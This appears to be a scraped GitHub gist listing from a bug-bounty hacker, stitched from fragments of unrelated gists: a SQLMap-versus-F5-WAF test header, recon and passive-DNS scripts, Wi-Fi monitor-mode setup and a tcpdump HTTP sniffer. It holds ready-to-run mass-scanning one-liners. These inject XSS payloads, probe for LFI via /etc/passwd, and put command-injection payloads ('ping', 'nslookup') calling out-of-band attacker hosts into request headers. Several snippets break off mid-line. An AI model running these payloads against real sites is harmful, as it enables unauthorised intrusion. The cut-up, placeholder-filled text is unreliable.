Eno Leriand 0x3n0

@0x3n0
0x3n0 / sqlmap.md
Last active November 17, 2022 14:51

SQLMap Tamper scripts evaluation against F5 Big-IP ASM WAF

The table below shows the results of tests run against an F5 Big-IP ASM WAF appliance in its XX version of YY and ZZ version of XY.

The names below are passed to sqlmap's --tamper= parameter.

The Violation Rating column gives the most common rating among the top 20 requests observed by F5 in its Security>>Event Logs:Application:Requests view.

The scale is 0-5.

#!/bin/bash
function usage () {
    echo "usage: yt"
    echo "  -h        help"
    echo "  -c        channels/subscriptions"
    echo "  -s query  search"
    echo "  -g / -r   gui mode (rofi/dmenu)"
    echo "  -m        music mode (audio only) [dont use with -r]"
    echo "  nothing   use defaults (search from prompt)"
@0x3n0
0x3n0 / check.py
Last active December 22, 2022 08:09
#!/usr/bin/python3
# Check email provider
import aiohttp
import asyncio
import argparse
import base64
import datetime
import json
import logging
### one liner ###
gauplus https://redacted.org | uro | grep ".php" | grep -i get | sed 's/.*.get//' | cut -f1 -d"." | sed 's/[A-Z]\+/\n&/g' | sort -u
##################
gauplus https://redacted.org/ | uro | grep ".php" > php-files.txt
grep -i get php-files.txt | sed 's/.*.get//' | sort -u
grep -i get php-files.txt | sed 's/.*.get//' | cut -f1 -d"." | sort -u
@0x3n0
0x3n0 / oneliner
Last active January 21, 2023 10:10
assetfinder https://exmple.com | gau --subs | egrep -v '(.css|.svg)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Z0-9]+" | sed -e 's,'var','"$url"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=1"><svg onload=alert(1)>/g'); echo -e "\e[1;33m$url\n\e[1;32m$vars";done
assetfinder https://exmple.com | gau --subs https://exmple.com | gf lfi | place "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
gf lfi output/domains.txt | place FUZZ | while read url ; do ffuf -u $url -mr "root:x" -H "Host: $(hostname).burpcollab.net" -H "Referer: 8.8.8.8;ping -c 3 $(hostname).burpcollab.net" -H "X-Forwarded-Host: 8.8.8.8;nslookup+callesvmkd63gvfclgjg63ktieresg7dt.oast.online" -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/101.0.4951.64 Safari/537.36" -w ~/wordlist.txt -fc 405 -mc 200,403 -ac true; done
### DNS rebinding for RCE
gf lfi output/*.txt | place FUZZ | while read url ; do ffuf -u $url -mr "root:x" -H
import json, asyncio, pickle, os
from pathlib import Path
from takeover.takeover import takeover

home = str(Path.home())
# config is a dictionary; see ~/.config/takeover/config.json for its structure
with open(home + "/.config/takeover/config.json") as f:
    config = json.load(f)
# Do not forget to replace the pointer to fingerprints with valid data; see ~/.config/takeover/fingerprints.json for its structure
@0x3n0
0x3n0 / recon.sh
Last active February 6, 2023 11:12
#!/usr/bin/env zsh
rm -rf ~/recon
mkdir ~/recon
cd ~/recon || exit 1
curl -O "https://raw.githubusercontent.com/projectdiscovery/public-bugbounty-programs/master/chaos-bugbounty-list.json"
# one directory per program name (names are quoted because they may contain spaces)
jq -r '.programs[].name' chaos-bugbounty-list.json | while read -r folder; do mkdir -p "$folder"; done
# one passive-DNS lookup per line of IP.txt; anew appends only new results to the file "last"
while read -r i; do curl -s -X POST https://api.mnemonic.no/pdns/v3/search -H 'Content-Type: application/json' --data "{\"query\":\"$i\"}" | jq . | egrep "query" | awk -F: '{print $2 }' | cut -d'"' -f2 | anew last; done < IP.txt
Or add this function to .bashrc:
mn(){
    curl -s -X POST https://api.mnemonic.no/pdns/v3/search -H 'Content-Type: application/json' --data "{\"query\":\"$1\"}" | jq . | egrep "query" | awk -F: '{print $2 }' | cut -d'"' -f2
}
1. Connect the wireless WiFi card, rename the interface to wlan1, and set up monitor mode
# list the interfaces to find the card's current name
ip a
# rename the interface (it must be down while renaming)
sudo ip link set wlxd03745ed27d0 down
sudo ip link set wlxd03745ed27d0 name wlan1
sudo ip link set wlan1 up
tcpdump -i ens192 -A -s 10240 'tcp port 80' | grep -v IP | egrep --line-buffered "..(GET |\.HTTP\/|POST |HEAD )|^[A-Za-z0-9-]+: " |sed -r 's/..(GET |HTTP\/|POST |HEAD )/\n\n\1/g'